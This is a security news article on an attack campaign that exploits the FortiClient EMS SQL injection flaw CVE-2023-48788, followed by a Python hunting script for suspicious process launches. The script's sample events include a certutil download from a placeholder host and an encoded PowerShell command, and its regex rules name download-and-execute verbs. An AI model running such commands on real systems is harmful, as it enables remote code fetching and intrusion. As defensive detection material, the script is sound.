The Fortinet bug has become the main tool of a new hacking campaign

Administrator negligence leads to theft of corporate data.

Forescout has discovered a new campaign that exploits a vulnerability in Fortinet FortiClient EMS devices to spread malware.

The SQL injection vulnerability CVE-2023-48788 (CVSS score: 9.8) allows an unauthenticated attacker to execute code using specially crafted requests. The attack requires no user interaction and is fairly easy to carry out.

Forescout tracks the campaign under the codename Connect:fun, after the post-compromise use of the ScreenConnect and Powerfun tools. The attack targeted an unnamed media company whose vulnerable FortiClient EMS device was exposed to the Internet.

Recall that a PoC exploit for this vulnerability was published online on March 21. On March 25, the exploit ran PowerShell code that loaded the Metasploit Powerfun script and initiated a reverse connection to a different IP address. It was also revealed that SQL queries were used to download ScreenConnect from a remote domain via the certutil utility, after which the program was installed and established communication with its management server.

Forescout notes that the attackers, active since at least 2022, specialize in attacks on Fortinet devices and use Vietnamese and German in their infrastructure. Their activity indicates a manual component in the attacks, evidenced by numerous failed attempts to download and install tools and by long pauses between attempts. This points to a targeted campaign rather than mass automated attacks.

Companies are advised to apply Fortinet's patches to neutralize the threat, monitor for suspicious traffic, and use firewalls to block potentially malicious requests.
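The post-exploitation chain described above (the database service spawning certutil and PowerShell to fetch and run remote tools) is something a defender can hunt for in process-creation telemetry. The following Python is an added example, not Forescout's or Fortinet's code; the sample events are constructed, Sysmon-style records with placeholder paths and domains, and the rule names are our own.

```python
import re

# Constructed sample Windows process-creation events (Sysmon-style fields);
# not telemetry from the incident, paths and domains are placeholders.
SAMPLE_EVENTS = [
    {  # SQL Server service spawning certutil to fetch an installer
        "parent_image": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
        "image": r"C:\Windows\System32\certutil.exe",
        "command_line": r"certutil -urlcache -split -f http://example.invalid/ScreenConnect.msi C:\Windows\Temp\sc.msi",
    },
    {  # SQL Server service spawning PowerShell with an encoded command (placeholder blob)
        "parent_image": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -nop -w hidden -EncodedCommand QUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ==",
    },
    {  # Benign: certutil used by an admin shell for its intended purpose
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\certutil.exe",
        "command_line": r"certutil -hashfile C:\Users\admin\Downloads\update.msi SHA256",
    },
    {  # Benign: scheduled task running a local script
        "parent_image": r"C:\Windows\System32\svchost.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell.exe -File C:\Scripts\backup.ps1",
    },
]

# Rule 1: the database engine should never be a parent of a shell or of certutil.
SQL_SERVICE = re.compile(r"\\sqlservr\.exe$", re.IGNORECASE)
SHELLS = re.compile(r"\\(cmd|powershell|pwsh|certutil)\.exe$", re.IGNORECASE)
# Rule 2: certutil pulling a file from a URL rather than hashing/decoding local files.
CERTUTIL_FETCH = re.compile(r"certutil.*-urlcache.*-f\s+\w+://", re.IGNORECASE)
# Rule 3: PowerShell with an encoded command or in-memory download/execute verbs.
PS_SUSPICIOUS = re.compile(
    r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|DownloadString|\bIEX\b|Invoke-Expression",
    re.IGNORECASE,
)

def classify(event):
    """Return the names of the rules an event matches (empty list means benign)."""
    hits = []
    if SQL_SERVICE.search(event["parent_image"]) and SHELLS.search(event["image"]):
        hits.append("sql_server_spawned_shell")
    if CERTUTIL_FETCH.search(event["command_line"]):
        hits.append("certutil_remote_fetch")
    if "powershell" in event["image"].lower() and PS_SUSPICIOUS.search(event["command_line"]):
        hits.append("powershell_encoded_or_download")
    return hits

def scan(events):
    """Return (index, matched_rules) for every event that trips at least one rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]
```

Run against real Sysmon Event ID 1 or EDR process data, the parent-child rule is the highest-signal one here: on a FortiClient EMS host the SQL Server service has no legitimate reason to launch certutil or PowerShell, so a single hit warrants an incident, while the certutil and PowerShell rules on their own need tuning against admin activity.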